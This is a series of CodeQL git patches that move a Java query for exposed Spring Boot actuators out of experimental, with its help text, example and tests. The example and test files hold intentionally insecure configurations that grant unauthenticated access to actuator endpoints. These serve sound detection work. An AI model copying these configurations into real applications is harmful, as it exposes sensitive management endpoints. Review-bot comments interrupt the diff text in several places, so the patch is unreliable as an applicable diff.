From: Paolo Tranquilli Date: Wed, 19 Feb 2025 10:37:52 +0100 Subject: [PATCH 010/892] Rust: move nested ql test out --- .../disabled => canonical_path_disabled}/anonymous.rs | 4 ++-- .../canonical_paths.expected | 0 .../canonical_paths.qlref | 0 .../disabled => canonical_path_disabled}/options.yml | 0 .../disabled => canonical_path_disabled}/regular.rs | 4 ++-- 5 files changed, 4 insertions(+), 4 deletions(-) rename rust/ql/test/extractor-tests/{canonical_path/disabled => canonical_path_disabled}/anonymous.rs (81%) rename rust/ql/test/extractor-tests/{canonical_path/disabled => canonical_path_disabled}/canonical_paths.expected (100%) rename rust/ql/test/extractor-tests/{canonical_path/disabled => canonical_path_disabled}/canonical_paths.qlref (100%) rename rust/ql/test/extractor-tests/{canonical_path/disabled => canonical_path_disabled}/options.yml (100%) rename rust/ql/test/extractor-tests/{canonical_path/disabled => canonical_path_disabled}/regular.rs (88%) diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs b/rust/ql/test/extractor-tests/canonical_path_disabled/anonymous.rs similarity index 81% rename from rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs rename to rust/ql/test/extractor-tests/canonical_path_disabled/anonymous.rs index d26ea6b992d7..a5a6abd136cf 100644 --- a/rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs +++ b/rust/ql/test/extractor-tests/canonical_path_disabled/anonymous.rs @@ -1,5 +1,5 @@ -// would prefer to write `include!("../anonymous.rs");` -// but it seems `include!` does not work in rust-analyzer/our extractor +// would prefer to write `include!("../canonical_paths/anonymous.rs");` +// but `include!` does not work with out-of-dir files use super::regular::Trait; 
diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected b/rust/ql/test/extractor-tests/canonical_path_disabled/canonical_paths.expected similarity index 100% rename from rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected rename to rust/ql/test/extractor-tests/canonical_path_disabled/canonical_paths.expected diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref b/rust/ql/test/extractor-tests/canonical_path_disabled/canonical_paths.qlref similarity index 100% rename from rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref rename to rust/ql/test/extractor-tests/canonical_path_disabled/canonical_paths.qlref diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/options.yml b/rust/ql/test/extractor-tests/canonical_path_disabled/options.yml similarity index 100% rename from rust/ql/test/extractor-tests/canonical_path/disabled/options.yml rename to rust/ql/test/extractor-tests/canonical_path_disabled/options.yml diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs b/rust/ql/test/extractor-tests/canonical_path_disabled/regular.rs similarity index 88% rename from rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs rename to rust/ql/test/extractor-tests/canonical_path_disabled/regular.rs index 44483645485a..b958e0c02dad 100644 --- a/rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs +++ b/rust/ql/test/extractor-tests/canonical_path_disabled/regular.rs @@ -1,5 +1,5 @@ -// would prefer to write `include!("../regular.rs");` -// but it seems `include!` does not work in rust-analyzer/our extractor +// would prefer to write `include!("../canonical_path/regular.rs"); +// but `include!` does not work with out-of-dir files #[derive(Eq, PartialEq)] pub struct Struct; From 2ce5920c5e9b387410358b23d4f70b0d023f4535 Mon Sep 17 00:00:00 2001 
From: Jami Cogswell Date: Sun, 16 Feb 2025 12:10:36 -0500 Subject: [PATCH 011/892] Java: copy out of experimental --- .../CWE/CWE-016/SpringBootActuators.java | 22 +++ .../CWE/CWE-016/SpringBootActuators.qhelp | 39 +++++ .../CWE/CWE-016/SpringBootActuators.ql | 20 +++ .../CWE/CWE-016/SpringBootActuators.qll | 157 ++++++++++++++++++ .../CWE-016/SpringBootActuators.expected | 7 + .../security/CWE-016/SpringBootActuators.java | 104 ++++++++++++ .../CWE-016/SpringBootActuators.qlref | 1 + .../test/query-tests/security/CWE-016/options | 1 + 8 files changed, 351 insertions(+) create mode 100644 java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java create mode 100644 java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp create mode 100644 java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql create mode 100644 java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll create mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected create mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java create mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref create mode 100644 java/ql/test/query-tests/security/CWE-016/options diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java new file mode 100644 index 000000000000..5aec49837cac --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java 
@@ -0,0 +1,22 @@
+@Configuration(proxyBeanMethods = false)
+public class SpringBootActuators extends WebSecurityConfigurerAdapter {
+
+ @Override
+ protected void configure(HttpSecurity http) throws Exception {
+ // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed
+ http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) ->
+ requests.anyRequest().permitAll());
+ }
+}
+
+@Configuration(proxyBeanMethods = false)
+public class ActuatorSecurity extends WebSecurityConfigurerAdapter {
+
+ @Override
+ protected void configure(HttpSecurity http) throws Exception {
+ // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints
+ http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) ->
+ requests.anyRequest().hasRole("ENDPOINT_ADMIN"));
+ http.httpBasic();
+ }
+}
diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp
new file mode 100644
index 000000000000..53ee653aaff3
--- /dev/null
+++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp
@@ -0,0 +1,39 @@
+
+
+
+

Spring Boot includes a number of additional features called actuators that let you monitor +and interact with your web application. Exposing unprotected actuator endpoints via JXM or HTTP +can, however, lead to information disclosure or even to remote code execution vulnerability.

+
+ + +

Since actuator endpoints may contain sensitive information, careful consideration should be +given about when to expose them. You should take care to secure exposed HTTP endpoints in the same +way that you would any other sensitive URL. If Spring Security is present, endpoints are secured by +default using Spring Security’s content-negotiation strategy. If you wish to configure custom +security for HTTP endpoints, for example, only allow users with a certain role to access them, +Spring Boot provides some convenient RequestMatcher objects that can be used in +combination with Spring Security.

+
+ + +

In the first example, the custom security configuration allows unauthenticated access to all +actuator endpoints. This may lead to sensitive information disclosure and should be avoided.

+

In the second example, only users with ENDPOINT_ADMIN role are allowed to access +the actuator endpoints.

+ + +
+ + +
  • +Spring Boot documentation: +Actuators. +
  • +
  • +Exploiting Spring Boot Actuators +
  • +
    +
    diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql
new file mode 100644
index 000000000000..574336074254
--- /dev/null
+++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql
@@ -0,0 +1,20 @@
+/**
+ * @name Exposed Spring Boot actuators
+ * @description Exposing Spring Boot actuators may lead to internal application's information leak
+ * or even to remote code execution.
+ * @kind problem
+ * @problem.severity error
+ * @precision high
+ * @id java/spring-boot-exposed-actuators
+ * @tags security
+ * experimental
+ * external/cwe/cwe-16
+ */
+
+import java
+deprecated import SpringBootActuators
+
+deprecated query predicate problems(PermitAllCall permitAllCall, string message) {
+ permitAllCall.permitsSpringBootActuators() and
+ message = "Unauthenticated access to Spring Boot actuator is allowed."
+}
diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll
new file mode 100644
index 000000000000..881f2a131720
--- /dev/null
+++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll
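Review bot: The metadata block of `SpringBootActuators.ql` still lists `experimental` under `@tags` although the file now sits in `java/ql/src/Security/CWE/CWE-016/`, and it carries no `@security-severity` property, which, as far as I know, the CodeQL query metadata guide expects on queries tagged `security`. The later hunk on this file in PATCH 012 starts at line 12, so it leaves the tag block as it is. I would drop the ` * experimental` line and add ` * @security-severity <score>` after `@problem.severity` (the score is a placeholder for the query owners to choose). It is also worth confirming that `@precision high` still holds for a query that is no longer experimental.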
@@ -0,0 +1,157 @@ +deprecated module; + +import java + +/** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ +class TypeHttpSecurity extends Class { + TypeHttpSecurity() { + this.hasQualifiedName("org.springframework.security.config.annotation.web.builders", + "HttpSecurity") + } +} + +/** + * The class + * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer`. + */ +class TypeAuthorizedUrl extends Class { + TypeAuthorizedUrl() { + this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", + "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>") + } +} + +/** + * The class `org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry`. + */ +class TypeAbstractRequestMatcherRegistry extends Class { + TypeAbstractRequestMatcherRegistry() { + this.hasQualifiedName("org.springframework.security.config.annotation.web", + "AbstractRequestMatcherRegistry>") + } +} + +/** + * The class `org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest`. + */ +class TypeEndpointRequest extends Class { + TypeEndpointRequest() { + this.hasQualifiedName("org.springframework.boot.actuate.autoconfigure.security.servlet", + "EndpointRequest") + } +} + +/** A call to `EndpointRequest.toAnyEndpoint` method. */ +class ToAnyEndpointCall extends MethodCall { + ToAnyEndpointCall() { + this.getMethod().hasName("toAnyEndpoint") and + this.getMethod().getDeclaringType() instanceof TypeEndpointRequest + } +} + +/** + * A call to `HttpSecurity.requestMatcher` method with argument `RequestMatcher.toAnyEndpoint()`. 
+ */ +class RequestMatcherCall extends MethodCall { + RequestMatcherCall() { + this.getMethod().hasName("requestMatcher") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and + this.getArgument(0) instanceof ToAnyEndpointCall + } +} + +/** + * A call to `HttpSecurity.requestMatchers` method with lambda argument + * `RequestMatcher.toAnyEndpoint()`. + */ +class RequestMatchersCall extends MethodCall { + RequestMatchersCall() { + this.getMethod().hasName("requestMatchers") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and + this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall + } +} + +/** A call to `HttpSecurity.authorizeRequests` method. */ +class AuthorizeRequestsCall extends MethodCall { + AuthorizeRequestsCall() { + this.getMethod().hasName("authorizeRequests") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** A call to `AuthorizedUrl.permitAll` method. */ +class PermitAllCall extends MethodCall { + PermitAllCall() { + this.getMethod().hasName("permitAll") and + this.getMethod().getDeclaringType() instanceof TypeAuthorizedUrl + } + + /** Holds if `permitAll` is called on request(s) mapped to actuator endpoint(s). */ + predicate permitsSpringBootActuators() { + exists(AuthorizeRequestsCall authorizeRequestsCall | + // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] + authorizeRequestsCall.getQualifier() instanceof RequestMatcherCall + or + // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] 
+ authorizeRequestsCall.getQualifier() instanceof RequestMatchersCall + | + // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or + // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) + authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and + ( + this.getQualifier() instanceof AnyRequestCall or + this.getQualifier() instanceof RegistryRequestMatchersCall + ) + or + // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or + // [...].authorizeRequests().anyRequest().permitAll() + authorizeRequestsCall.getNumArgument() = 0 and + exists(RegistryRequestMatchersCall registryRequestMatchersCall | + registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + this.getQualifier() = registryRequestMatchersCall + ) + or + exists(AnyRequestCall anyRequestCall | + anyRequestCall.getQualifier() = authorizeRequestsCall and + this.getQualifier() = anyRequestCall + ) + ) + or + exists(AuthorizeRequestsCall authorizeRequestsCall | + // http.authorizeRequests([...]).[...] + authorizeRequestsCall.getQualifier() instanceof VarAccess + | + // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) + authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and + this.getQualifier() instanceof RegistryRequestMatchersCall + or + // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or + authorizeRequestsCall.getNumArgument() = 0 and + exists(RegistryRequestMatchersCall registryRequestMatchersCall | + registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + this.getQualifier() = registryRequestMatchersCall + ) + ) + } +} + +/** A call to `AbstractRequestMatcherRegistry.anyRequest` method. 
*/ +class AnyRequestCall extends MethodCall { + AnyRequestCall() { + this.getMethod().hasName("anyRequest") and + this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry + } +} + +/** + * A call to `AbstractRequestMatcherRegistry.requestMatchers` method with an argument + * `RequestMatcher.toAnyEndpoint()`. + */ +class RegistryRequestMatchersCall extends MethodCall { + RegistryRequestMatchersCall() { + this.getMethod().hasName("requestMatchers") and + this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry and + this.getAnArgument() instanceof ToAnyEndpointCall + } +} diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected new file mode 100644 index 000000000000..f2874e3694d1 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected @@ -0,0 +1,7 @@ +| SpringBootActuators.java:6:88:6:120 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:10:5:10:137 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:14:5:14:149 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:18:5:18:101 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:22:5:22:89 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:26:40:26:108 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:30:5:30:113 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java new file mode 100644 index 000000000000..da59919fbe6c 
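Review bot: The classes in `SpringBootActuators.qll` only recognise the `requestMatcher`/`requestMatchers` then `authorizeRequests` then `permitAll` chain on `ExpressionUrlAuthorizationConfigurer`, so a configuration written with the newer `HttpSecurity.securityMatcher(...)` and `authorizeHttpRequests(...)` calls raises no alert even when it permits every actuator endpoint. For a query leaving experimental at `@precision high` that is a silent class of false negatives, and the sample file and the tests use only the older API as well. The name checks could accept both spellings, for example `this.getMethod().hasName(["authorizeRequests", "authorizeHttpRequests"])` in `AuthorizeRequestsCall` and `this.getMethod().hasName(["requestMatcher", "securityMatcher"])` in `RequestMatcherCall`, with `TypeAuthorizedUrl` extended to the `AuthorizedUrl` class nested in `AuthorizeHttpRequestsConfigurer`. Testing that would presumably need stubs newer than the `springframework-5.3.8` ones named in the test `options` file. If the extension is out of scope for this move, a sentence in the QLDoc of `permitsSpringBootActuators` stating which API forms are covered would keep the limit visible to users of the query.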
--- /dev/null +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java 
@@ -0,0 +1,104 @@ +import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest; +import org.springframework.security.config.annotation.web.builders.HttpSecurity; + +public class SpringBootActuators { + protected void configure(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); + } + + protected void configure2(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + } + + protected void configure3(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + } + + protected void configure4(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); + } + + protected void configure5(HttpSecurity http) throws Exception { + http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + } + + protected void configure6(HttpSecurity http) throws Exception { + http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); + } + + protected void configure7(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); + } + + protected void configureOk1(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOk2(HttpSecurity http) throws Exception { + http.requestMatchers().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOk3(HttpSecurity http) throws Exception { + http.authorizeRequests().anyRequest().permitAll(); + } + + protected void configureOk4(HttpSecurity 
http) throws Exception { + http.authorizeRequests(authz -> authz.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints1(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests(requests -> requests.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints2(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health")).authorizeRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); + } + + protected void configureOkSafeEndpoints3(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints4(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); + } + + protected void configureOkSafeEndpoints5(HttpSecurity http) throws Exception { + http.authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints6(HttpSecurity http) throws Exception { + http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.to("health", "info")).permitAll()); + } + + protected void configureOkSafeEndpoints7(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); + } + + protected void configureOkNoPermitAll1(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest()); + } + + protected void configureOkNoPermitAll2(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void 
configureOkNoPermitAll3(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll4(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); + } + + protected void configureOkNoPermitAll5(HttpSecurity http) throws Exception { + http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll6(HttpSecurity http) throws Exception { + http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint())); + } + + protected void configureOkNoPermitAll7(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); + } +} diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref new file mode 100644 index 000000000000..ec49ecd718c2 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref @@ -0,0 +1 @@ +experimental/Security/CWE/CWE-016/SpringBootActuators.ql diff --git a/java/ql/test/query-tests/security/CWE-016/options b/java/ql/test/query-tests/security/CWE-016/options new file mode 100644 index 000000000000..06ec85dc706c --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-016/options @@ -0,0 +1 @@ +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 From 978834bd9cc0ec542e45988a82613a0c7a14e40e Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Sun, 16 Feb 2025 12:16:14 -0500 Subject: [PATCH 012/892] Java: remove deprecations --- java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql | 9 ++++----- java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll | 2 -- 2 files changed, 4 insertions(+), 7 deletions(-) 
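Review bot: `configureOk3` and `configureOk4` pin `authorizeRequests()` with `anyRequest().permitAll()` as a non-result, yet a chain that permits every request also leaves actuator paths unauthenticated unless a separate filter chain protects them, so the test records a blind spot of the query as if it were safe code. The `configureOkSafeEndpoints*` cases likewise only use `EndpointRequest.to("health", "info")` or `EndpointRequest.to("health")`, and no case shows what the query does for `EndpointRequest.to(...)` naming a sensitive endpoint. I would add a comment above `configureOk3` such as `// Not flagged: blanket permitAll() is outside this query's scope, although it also opens actuator paths`, plus one `permitAll()` case on `EndpointRequest.to(...)` with a sensitive endpoint name and whatever result the query is meant to give. A short `// BAD` or `// GOOD` comment on each method would also let a reader match the seven rows of `SpringBootActuators.expected` without counting columns.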
diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql index 574336074254..b700e691550f 100644 --- a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql @@ -12,9 +12,8 @@ */ import java -deprecated import SpringBootActuators +import SpringBootActuators -deprecated query predicate problems(PermitAllCall permitAllCall, string message) { - permitAllCall.permitsSpringBootActuators() and - message = "Unauthenticated access to Spring Boot actuator is allowed." -} +from PermitAllCall permitAllCall +where permitAllCall.permitsSpringBootActuators() +select permitAllCall, "Unauthenticated access to Spring Boot actuator is allowed." diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll index 881f2a131720..195de7a1b8be 100644 --- a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll @@ -1,5 +1,3 @@ -deprecated module; - import java /** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ From 089a491d5a332f4aa43e53e518b79088673f38af Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Sun, 16 Feb 2025 12:20:23 -0500 Subject: [PATCH 013/892] Java: fix tests; update for non-experimental directory --- .../test/query-tests/security/CWE-016/SpringBootActuators.qlref | 2 +- java/ql/test/query-tests/security/CWE-016/options | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref index ec49ecd718c2..abd5f2a75991 100644 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref 
@@ -1 +1 @@ -experimental/Security/CWE/CWE-016/SpringBootActuators.ql +Security/CWE/CWE-016/SpringBootActuators.ql diff --git a/java/ql/test/query-tests/security/CWE-016/options b/java/ql/test/query-tests/security/CWE-016/options index 06ec85dc706c..38d1d754b69c 100644 --- a/java/ql/test/query-tests/security/CWE-016/options +++ b/java/ql/test/query-tests/security/CWE-016/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.3.8 From 5e5bc2afe9d4264a226897b49a8903b37bfebaa1 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Sun, 16 Feb 2025 12:30:42 -0500 Subject: [PATCH 014/892] Java: remove experimental files --- .../CWE/CWE-016/SpringBootActuators.java | 22 --- .../CWE/CWE-016/SpringBootActuators.qhelp | 39 ----- .../CWE/CWE-016/SpringBootActuators.ql | 20 --- .../CWE/CWE-016/SpringBootActuators.qll | 157 ------------------ .../CWE-016/SpringBootActuators.expected | 7 - .../security/CWE-016/SpringBootActuators.java | 104 ------------ .../CWE-016/SpringBootActuators.qlref | 1 - 7 files changed, 350 deletions(-) delete mode 100644 java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.java delete mode 100644 java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qhelp delete mode 100644 java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql delete mode 100644 java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qll delete mode 100644 java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.expected delete mode 100644 java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.java delete mode 100644 java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.qlref 
diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.java b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.java deleted file mode 100644 index 538620550efc..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.java +++ /dev/null @@ -1,22 +0,0 @@ -@Configuration(proxyBeanMethods = false) -public class SpringBootActuators extends WebSecurityConfigurerAdapter { - - @Override - protected void configure(HttpSecurity http) throws Exception { - // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().permitAll()); - } -} - -@Configuration(proxyBeanMethods = false) -public class ActuatorSecurity extends WebSecurityConfigurerAdapter { - - @Override - protected void configure(HttpSecurity http) throws Exception { - // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().hasRole("ENDPOINT_ADMIN")); - http.httpBasic(); - } -} \ No newline at end of file diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qhelp b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qhelp deleted file mode 100644 index 53ee653aaff3..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qhelp +++ /dev/null @@ -1,39 +0,0 @@ - - - -

    Spring Boot includes a number of additional features called actuators that let you monitor -and interact with your web application. Exposing unprotected actuator endpoints via JXM or HTTP -can, however, lead to information disclosure or even to remote code execution vulnerability.

    -
    - - -

    Since actuator endpoints may contain sensitive information, careful consideration should be -given about when to expose them. You should take care to secure exposed HTTP endpoints in the same -way that you would any other sensitive URL. If Spring Security is present, endpoints are secured by -default using Spring Security’s content-negotiation strategy. If you wish to configure custom -security for HTTP endpoints, for example, only allow users with a certain role to access them, -Spring Boot provides some convenient RequestMatcher objects that can be used in -combination with Spring Security.

    -
    - - -

    In the first example, the custom security configuration allows unauthenticated access to all -actuator endpoints. This may lead to sensitive information disclosure and should be avoided.

    -

    In the second example, only users with ENDPOINT_ADMIN role are allowed to access -the actuator endpoints.

    - - -
    - - -
  • -Spring Boot documentation: -Actuators. -
  • -
  • -Exploiting Spring Boot Actuators -
  • -
    -
    diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql deleted file mode 100644 index 574336074254..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql +++ /dev/null @@ -1,20 +0,0 @@ -/** - * @name Exposed Spring Boot actuators - * @description Exposing Spring Boot actuators may lead to internal application's information leak - * or even to remote code execution. - * @kind problem - * @problem.severity error - * @precision high - * @id java/spring-boot-exposed-actuators - * @tags security - * experimental - * external/cwe/cwe-16 - */ - -import java -deprecated import SpringBootActuators - -deprecated query predicate problems(PermitAllCall permitAllCall, string message) { - permitAllCall.permitsSpringBootActuators() and - message = "Unauthenticated access to Spring Boot actuator is allowed." -} diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qll b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qll deleted file mode 100644 index 881f2a131720..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qll +++ /dev/null 
@@ -1,157 +0,0 @@ -deprecated module; - -import java - -/** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ -class TypeHttpSecurity extends Class { - TypeHttpSecurity() { - this.hasQualifiedName("org.springframework.security.config.annotation.web.builders", - "HttpSecurity") - } -} - -/** - * The class - * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer`. - */ -class TypeAuthorizedUrl extends Class { - TypeAuthorizedUrl() { - this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", - "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>") - } -} - -/** - * The class `org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry`. - */ -class TypeAbstractRequestMatcherRegistry extends Class { - TypeAbstractRequestMatcherRegistry() { - this.hasQualifiedName("org.springframework.security.config.annotation.web", - "AbstractRequestMatcherRegistry>") - } -} - -/** - * The class `org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest`. - 